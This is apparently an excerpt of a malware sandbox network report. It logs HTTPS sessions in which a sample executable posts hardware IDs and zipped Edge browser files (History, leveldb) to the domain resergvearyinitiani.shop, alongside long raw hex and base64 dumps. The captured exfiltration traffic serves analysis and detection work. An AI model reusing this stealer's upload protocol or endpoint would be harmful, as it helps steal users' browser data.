                      Set-Cookie: PHPSESSID=m03j3omhsnh4iaubfgklnjj6lt; expires=Sun, 17-Nov-2024 22:18:55 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9P%2BENcxdAB2OHHBE2%2FWUc6H6MfyNzH9MVunreKSHE8OMsw9UKuc%2BdpMuEslmiarxKvWdgl8T52MWjtbIQEB4coqUXMY6OLEVPEc5LVi%2BRWukP%2F3QqThN3xtCEtGqXeitlY2jZdeEBCZO3ek%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cd31e88420d-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:16 UTC555INData Raw: 34 65 31 0d 0a 67 4f 64 44 55 4a 65 6f 51 41 55 2f 36 61 6c 30 61 35 6b 32 4d 59 63 59 69 51 41 45 30 54 58 4a 44 45 38 47 31 69 69 6f 66 51 6e 37 78 54 56 79 72 5a 78 73 4a 30 79 4d 69 30 34 66 36 30 4e 55 71 7a 72 6f 5a 43 62 72 55 36 68 67 50 47 50 36 43 74 34 51 4b 37 71 42 49 6a 7a 6b 7a 57 77 6e 57 70 47 4c 54 6a 44 69 46 46 54 70 4f 72 4d 69 59 62 74 58 71 47 41 74 5a 37 31 48 32 42 46 71 36 49 73 6b 4f 50 4c 4c 4a 47 52 54 68 4d 77 52 44 76 68 63 58 2b 35 31 34 57 30 6d 2f 52 65 73 64 6d 30 38 39 47 58 4e 43 57 6a 4e 68 6a 41 37 74 64 56 73 66 68 32 4d 78 31 5a 52 75 31 64 55 35 58 54 76 5a 47 2b 35 58 61 46 6f 4c 47 4b 38 57 4d 45 62 59 65 69 46 4a 7a 6e 34 77 6a 42 70 57 59 50 48 46 77 54 34 46 42 32 6c 66 66 4d 69 50 76 4d 45 6d 57 30 38 64 61
                      Data Ascii: 4e1gOdDUJeoQAU/6al0a5k2MYcYiQAE0TXJDE8G1iiofQn7xTVyrZxsJ0yMi04f60NUqzroZCbrU6hgPGP6Ct4QK7qBIjzkzWwnWpGLTjDiFFTpOrMiYbtXqGAtZ71H2BFq6IskOPLLJGRThMwRDvhcX+514W0m/Resdm089GXNCWjNhjA7tdVsfh2Mx1ZRu1dU5XTvZG+5XaFoLGK8WMEbYeiFJzn4wjBpWYPHFwT4FB2lffMiPvMEmW08da
                      2024-07-25 04:32:16 UTC701INData Raw: 72 6b 47 47 6a 77 78 78 51 78 2b 38 51 6c 63 52 32 55 68 51 39 4a 2f 46 67 54 76 54 72 6c 5a 32 6d 68 56 72 6c 72 49 33 61 34 54 38 77 53 61 4f 79 46 4a 44 58 34 78 43 52 67 58 6f 50 50 46 77 66 33 58 6c 44 68 65 61 73 73 4a 72 52 50 36 7a 5a 74 56 62 64 4f 7a 51 31 6f 37 4d 55 2b 66 4f 79 4b 4a 57 73 64 30 34 73 63 44 2f 5a 64 57 4f 4a 79 35 33 42 74 76 46 53 69 61 53 74 75 74 30 4c 41 47 57 58 6a 67 69 51 31 35 38 51 70 61 6c 36 42 7a 56 5a 48 75 31 4e 4c 70 53 4b 72 54 47 57 69 51 5a 6c 74 50 48 58 30 56 59 51 47 4b 2b 57 4a 59 57 71 31 77 79 70 6f 55 49 62 42 47 41 7a 32 58 56 4c 6b 64 2b 31 70 5a 37 74 66 72 32 6b 74 59 4c 6c 46 78 42 39 6c 36 6f 41 6c 4f 50 79 4b 62 43 64 61 6b 34 74 4f 53 63 74 5a 58 2b 35 32 71 56 64 6c 76 56 6d 73 65 47 31 37 2b
                      Data Ascii: rkGGjwxxQx+8QlcR2UhQ9J/FgTvTrlZ2mhVrlrI3a4T8wSaOyFJDX4xCRgXoPPFwf3XlDheassJrRP6zZtVbdOzQ1o7MU+fOyKJWsd04scD/ZdWOJy53BtvFSiaStut0LAGWXjgiQ158Qpal6BzVZHu1NLpSKrTGWiQZltPHX0VYQGK+WJYWq1wypoUIbBGAz2XVLkd+1pZ7tfr2ktYLlFxB9l6oAlOPyKbCdak4tOSctZX+52qVdlvVmseG17+
                      2024-07-25 04:32:16 UTC1369INData Raw: 33 64 33 66 0d 0a 49 4c 5a 48 41 58 31 52 6c 37 76 66 2b 56 75 59 37 78 58 71 6d 38 6a 62 72 38 4b 68 46 39 73 2b 73 56 35 63 74 72 48 4d 6e 56 58 67 4e 70 55 50 50 68 61 58 65 4a 73 71 33 30 6f 71 68 65 73 59 6d 30 38 39 45 48 4d 45 32 66 69 67 7a 4d 38 2b 74 67 6f 64 56 6d 46 7a 78 6f 48 38 6c 6c 63 34 47 6a 76 59 6e 53 79 55 71 78 67 49 48 61 78 43 6f 52 66 62 50 72 46 65 58 4c 50 2f 69 56 33 54 49 79 4a 49 77 72 31 57 6c 54 7a 4f 76 51 73 66 2f 4e 51 70 79 35 31 4a 4c 64 47 78 78 5a 75 37 5a 63 72 50 76 54 59 4a 57 35 55 67 63 6f 59 42 76 42 59 56 76 64 78 35 47 70 70 73 6c 71 6d 5a 53 6c 6b 39 41 53 4b 47 48 4f 69 33 57 45 54 2b 4d 55 77 5a 45 7a 4a 2f 68 55 48 39 56 4e 46 70 57 57 6c 65 79 61 30 57 2b 73 32 62 57 57 34 52 73 73 51 62 65 69 4e 49 6a
                      Data Ascii: 3d3fILZHAX1Rl7vf+VuY7xXqm8jbr8KhF9s+sV5ctrHMnVXgNpUPPhaXeJsq30oqhesYm089EHME2figzM8+tgodVmFzxoH8llc4GjvYnSyUqxgIHaxCoRfbPrFeXLP/iV3TIyJIwr1WlTzOvQsf/NQpy51JLdGxxZu7ZcrPvTYJW5UgcoYBvBYVvdx5GppslqmZSlk9ASKGHOi3WET+MUwZEzJ/hUH9VNFpWWleya0W+s2bWW4RssQbeiNIj
                      2024-07-25 04:32:16 UTC1369INData Raw: 5a 31 43 41 78 52 67 41 39 31 78 66 34 6d 6a 6d 5a 32 36 35 58 71 35 69 49 47 65 6d 53 63 74 66 4a 61 4b 43 4f 58 4b 74 69 67 56 55 61 71 69 4c 43 55 66 69 46 46 54 70 4f 72 4d 69 5a 37 74 51 70 57 6f 2f 61 71 5a 45 7a 52 39 74 36 6f 30 6d 50 76 76 45 4d 47 39 63 69 38 55 5a 41 66 4a 51 55 75 46 2b 35 32 55 6d 2f 52 65 73 64 6d 30 38 39 47 4c 4a 42 58 47 67 71 79 6f 79 38 74 6f 30 66 42 32 55 68 51 39 4a 2f 46 67 54 76 54 72 76 61 57 79 36 56 4b 4a 71 49 47 53 39 52 63 4d 58 5a 75 71 58 49 44 6a 6e 7a 69 64 6d 55 6f 48 50 48 67 58 30 57 46 66 33 63 61 73 73 4a 72 52 50 36 7a 5a 74 52 4c 39 63 36 51 31 35 6f 70 70 76 4b 37 58 4e 4c 69 63 46 79 38 49 61 43 50 70 65 56 65 35 2f 35 6d 4a 6a 75 56 43 6e 62 69 31 6e 73 6b 7a 48 46 32 50 75 69 53 49 2f 38 4d 34
                      Data Ascii: Z1CAxRgA91xf4mjmZ265Xq5iIGemSctfJaKCOXKtigVUaqiLCUfiFFTpOrMiZ7tQpWo/aqZEzR9t6o0mPvvEMG9ci8UZAfJQUuF+52Um/Resdm089GLJBXGgqyoy8to0fB2UhQ9J/FgTvTrvaWy6VKJqIGS9RcMXZuqXIDjnzidmUoHPHgX0WFf3cassJrRP6zZtRL9c6Q15oppvK7XNLicFy8IaCPpeVe5/5mJjuVCnbi1nskzHF2PuiSI/8M4
                      2024-07-25 04:32:16 UTC1369INData Raw: 63 6f 51 42 66 59 55 48 61 56 39 38 79 49 2b 38 33 43 78 59 79 74 7a 70 58 2f 4e 48 7a 71 69 6d 6d 38 72 74 63 30 75 4a 77 58 4c 78 68 6f 44 39 6c 46 58 37 58 33 6f 59 32 71 33 57 71 5a 71 4a 47 43 78 57 4e 67 5a 5a 65 4b 4b 4c 7a 33 35 32 43 78 69 58 59 65 4c 57 45 6e 38 54 42 4f 39 4f 74 70 31 5a 76 4e 49 35 58 64 74 59 37 67 4b 6b 6c 39 6b 37 35 63 74 50 66 58 4c 49 57 4e 57 6a 4d 30 51 43 50 68 52 55 4f 42 38 36 6d 4a 71 75 56 43 6a 5a 43 4e 70 73 6b 37 4d 47 53 75 73 78 53 59 71 74 5a 4a 69 56 56 43 46 77 68 55 50 39 6b 4a 37 31 44 72 30 4c 48 2f 7a 55 4b 63 75 64 53 53 77 51 63 49 54 62 75 71 41 49 44 72 2f 77 69 31 6f 54 34 72 45 48 77 37 77 57 56 7a 72 66 2b 56 77 59 62 68 63 6f 32 63 6a 59 76 51 45 69 68 68 7a 6f 74 31 68 42 50 62 45 4b 58 5a 53
                      Data Ascii: coQBfYUHaV98yI+83CxYytzpX/NHzqimm8rtc0uJwXLxhoD9lFX7X3oY2q3WqZqJGCxWNgZZeKKLz352CxiXYeLWEn8TBO9Otp1ZvNI5XdtY7gKkl9k75ctPfXLIWNWjM0QCPhRUOB86mJquVCjZCNpsk7MGSusxSYqtZJiVVCFwhUP9kJ71Dr0LH/zUKcudSSwQcITbuqAIDr/wi1oT4rEHw7wWVzrf+VwYbhco2cjYvQEihhzot1hBPbEKXZS
                      2024-07-25 04:32:16 UTC1369INData Raw: 6a 30 46 42 32 6c 66 66 4d 69 50 76 4e 6d 76 57 6b 71 61 2f 5a 6a 7a 51 52 71 36 49 59 71 50 72 58 56 62 48 34 64 6a 4d 64 57 55 62 74 5a 58 2b 68 2b 2b 57 35 6d 73 31 36 73 5a 44 39 72 75 30 66 4a 48 32 37 77 68 44 4d 39 2f 73 38 68 59 31 4b 45 78 78 34 44 75 78 6f 54 34 6d 4b 72 4f 69 61 66 56 4c 70 6b 62 30 4f 75 58 4d 30 54 65 75 6d 49 4c 58 4c 71 68 44 73 6e 57 6f 65 4c 54 6b 6e 37 56 56 37 33 66 2b 70 6f 62 4c 35 66 70 47 73 6f 61 37 42 4f 77 52 46 35 37 49 6f 68 4e 50 37 4c 4a 32 52 57 67 63 55 66 47 37 73 61 45 2b 4a 69 71 7a 6f 6d 6d 55 79 71 59 79 45 6d 6d 6b 48 63 47 43 6e 44 69 79 6f 31 2b 64 78 69 65 42 4f 53 69 78 45 46 75 77 77 54 37 48 54 6e 59 57 47 37 58 36 35 75 4a 6d 53 37 51 4d 51 59 65 65 69 4a 4b 79 44 36 79 53 39 6a 55 49 48 4f 48
                      Data Ascii: j0FB2lffMiPvNmvWkqa/ZjzQRq6IYqPrXVbH4djMdWUbtZX+h++W5ms16sZD9ru0fJH27whDM9/s8hY1KExx4DuxoT4mKrOiafVLpkb0OuXM0TeumILXLqhDsnWoeLTkn7VV73f+pobL5fpGsoa7BOwRF57IohNP7LJ2RWgcUfG7saE+JiqzommUyqYyEmmkHcGCnDiyo1+dxieBOSixEFuwwT7HTnYWG7X65uJmS7QMQYeeiJKyD6yS9jUIHOH
                      2024-07-25 04:32:16 UTC1369INData Raw: 42 35 6a 71 6c 49 6d 47 72 46 2f 4d 75 48 32 36 33 52 74 77 53 5a 4b 4b 61 62 79 75 31 7a 53 34 6e 42 63 76 5a 42 41 6e 77 56 46 54 72 61 4f 70 71 61 62 6c 58 72 57 55 6e 5a 37 31 4f 78 42 5a 74 34 34 67 67 4d 2f 58 50 49 6d 35 50 68 6f 74 59 53 66 78 4d 45 37 30 36 33 47 35 74 67 6c 53 39 4c 6a 49 71 72 51 72 4e 45 79 75 36 78 53 41 67 2b 4d 49 6d 5a 31 43 4e 77 42 63 49 2b 46 52 54 35 6e 72 75 61 57 6d 31 55 4b 5a 6b 4a 47 32 6d 51 73 34 4e 61 2b 36 42 59 58 79 31 7a 54 6f 6e 42 63 76 37 46 51 4c 33 56 46 37 77 4f 76 51 73 66 2f 4e 51 70 79 35 31 4a 4c 78 42 77 52 6c 67 34 59 59 76 4f 66 2f 46 4c 57 31 62 6a 63 4d 54 43 66 64 55 56 75 4e 2b 37 32 78 68 76 56 71 71 66 43 35 74 39 41 53 4b 47 48 4f 69 33 57 45 53 2f 74 77 6e 59 45 76 4a 2f 68 55 48 39 56
                      Data Ascii: B5jqlImGrF/MuH263RtwSZKKabyu1zS4nBcvZBAnwVFTraOpqablXrWUnZ71OxBZt44ggM/XPIm5PhotYSfxME7063G5tglS9LjIqrQrNEyu6xSAg+MImZ1CNwBcI+FRT5nruaWm1UKZkJG2mQs4Na+6BYXy1zTonBcv7FQL3VF7wOvQsf/NQpy51JLxBwRlg4YYvOf/FLW1bjcMTCfdUVuN+72xhvVqqfC5t9ASKGHOi3WES/twnYEvJ/hUH9V
                      2024-07-25 04:32:16 UTC1369INData Raw: 70 53 4a 30 38 77 2f 72 4b 53 35 32 70 6b 7a 4a 43 57 69 6c 75 78 38 53 2f 73 59 68 61 31 79 4d 69 31 68 4a 39 42 51 4c 33 44 72 6f 63 48 54 38 52 72 31 6a 50 57 50 34 51 74 73 53 5a 36 4c 4c 59 58 37 78 77 53 35 69 57 70 75 45 42 42 6e 77 57 45 57 70 66 76 6b 69 4b 50 4e 47 6f 47 45 2f 61 72 4d 46 32 77 6c 6d 38 6f 59 6b 4e 62 6e 43 4d 32 70 52 79 34 56 57 48 50 42 59 56 65 68 76 70 48 4e 77 73 45 47 73 49 69 56 31 75 55 61 4b 49 43 57 69 6e 57 46 71 74 66 38 68 61 56 4f 4d 33 51 64 45 32 31 39 66 35 6e 62 71 5a 53 62 39 46 36 30 75 64 54 66 36 43 73 34 4f 4b 37 72 56 63 32 6d 67 6d 58 55 33 44 35 53 46 44 30 6e 74 46 41 75 33 4e 4b 74 77 4a 75 73 58 37 47 30 2f 64 72 4a 4a 33 42 77 73 33 4c 73 67 50 2f 71 47 4c 47 78 64 6a 4e 73 41 45 72 64 63 55 50 39
                      Data Ascii: pSJ08w/rKS52pkzJCWilux8S/sYha1yMi1hJ9BQL3DrocHT8Rr1jPWP4QtsSZ6LLYX7xwS5iWpuEBBnwWEWpfvkiKPNGoGE/arMF2wlm8oYkNbnCM2pRy4VWHPBYVehvpHNwsEGsIiV1uUaKICWinWFqtf8haVOM3QdE219f5nbqZSb9F60udTf6Cs4OK7rVc2mgmXU3D5SFD0ntFAu3NKtwJusX7G0/drJJ3Bws3LsgP/qGLGxdjNsAErdcUP9
                      2024-07-25 04:32:16 UTC1369INData Raw: 62 52 70 6c 56 6b 38 59 36 51 49 37 42 78 39 34 63 56 76 63 75 32 4b 65 69 64 38 67 64 73 62 42 76 77 55 54 4b 74 6a 71 33 51 6d 36 77 54 6c 4c 6a 38 6b 37 41 71 4e 45 57 62 6a 68 69 38 78 35 39 67 6b 5a 45 75 49 6a 43 67 33 33 6c 6c 65 34 48 54 73 58 46 69 53 58 62 74 6a 49 6d 50 32 61 73 30 4a 61 4e 79 37 46 69 50 79 32 6d 42 42 58 70 33 49 56 6b 65 37 54 42 4f 39 4f 73 70 6f 64 72 35 59 72 43 77 4e 59 36 4a 4a 69 67 41 6c 2b 38 55 33 63 71 32 5a 62 43 64 50 79 35 4e 57 54 76 68 47 51 65 4e 35 2f 57 45 68 6a 57 6d 47 66 43 70 30 74 77 6a 37 45 6d 2f 30 6b 43 49 69 38 76 51 63 53 6b 2b 4d 32 78 56 4c 79 6b 4a 51 35 58 54 73 49 69 6a 7a 54 2b 73 32 62 55 6d 6d 54 64 6f 63 4b 2f 33 4c 4f 48 4c 6a 69 6e 6f 30 45 38 76 5a 56 6c 47 37 45 31 33 6f 65 2b 68 73
                      Data Ascii: bRplVk8Y6QI7Bx94cVvcu2Keid8gdsbBvwUTKtjq3Qm6wTlLj8k7AqNEWbjhi8x59gkZEuIjCg33lle4HTsXFiSXbtjImP2as0JaNy7FiPy2mBBXp3IVke7TBO9Ospodr5YrCwNY6JJigAl+8U3cq2ZbCdPy5NWTvhGQeN5/WEhjWmGfCp0twj7Em/0kCIi8vQcSk+M2xVLykJQ5XTsIijzT+s2bUmmTdocK/3LOHLjino0E8vZVlG7E13oe+hs


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549706188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:17 UTC290OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 13687
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:17 UTC13687OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 36 42 41 43 35 39 32 43 34 39 39 32 43 39 44 46 41 46 32 45 46 37 30 34 41 32 43 37 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:17 UTC818INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=42j83kf1dm1481fr41ag6djekn; expires=Sun, 17-Nov-2024 22:18:56 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44Ma5%2BUFjnKWXb0pIxEmMC%2BTzS64JIq3MakN3%2BJKkccw3yCTukLOO3D8Wf%2BKozSDiP81YLRhRhAQy8wPYzzKVrm6htgdoC3BJdVZr%2BVLiDfY3koqeJJOU8GM%2BeSd0YC4ugS%2BAxVC0mrOEqk%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896cdb38c46a55-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:17 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549707188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:18 UTC290OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 16230
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:18 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 36 42 41 43 35 39 32 43 34 39 39 32 43 39 44 46 41 46 32 45 46 37 30 34 41 32 43 37 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:18 UTC899OUTData Raw: 01 29 00 d6 ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 1f 06 f1 34 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50
                      Data Ascii: )|"leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryP
                      2024-07-25 04:32:18 UTC814INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=tvaie8e7np4v55tfjbbpieodo7; expires=Sun, 17-Nov-2024 22:18:57 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ungpe2jr3vhQPs4pnTtDQLaGR3O3bY2Lg3X%2F6LNcLq7ROfPSA1kd84%2FkOpvIZ2WL1m5XsTbR1ju69Z41%2BbJ2R44HdTnya9WCnpByAZp%2BWVaQxvY8cQlHAqwU%2BtLSUn6tDg1UyE4uv6888yo%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ce21f3b43b0-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:18 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549708188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:19 UTC290OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 20574
                      Host: resergvearyinitiani.shop
                      2024-07-25 04:32:19 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 36 36 42 41 43 35 39 32 43 34 39 39 32 43 39 44 46 41 46 32 45 46 37 30 34 41 32 43 37 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70
                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E766BAC592C4992C9DFAF2EF704A2C7E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GhJLkO--seevp
                      2024-07-25 04:32:19 UTC5243OUTData Raw: 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: BZ>56vMMZh'F3Wun 4F([:7s~X`nO
                      2024-07-25 04:32:20 UTC818INHTTP/1.1 200 OK
                      Date: Thu, 25 Jul 2024 04:32:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: PHPSESSID=c7pb7c3u16vkao5r86e4pqc5cu; expires=Sun, 17-Nov-2024 22:18:59 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQhEWhaQdY%2BCBldaCZ8mh6S48QP9Bn22xeoc%2BGUuegnFQuyTlrzUB6wkuIaMErxP5WLsNTwHF9vtFow%2FYpzQl68gljzn3WTyzsunL%2F0El8pKf%2Foaig2Dhnpd9yvgx%2BsqoS2ItD%2FYrkyRsbM%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8a896ceccb0f42e8-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-07-25 04:32:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                      Data Ascii: eok 8.46.123.33
                      2024-07-25 04:32:20 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.549709188.114.97.34434424C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exe
                      TimestampBytes transferredDirectionData
                      2024-07-25 04:32:22 UTC289OUTPOST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
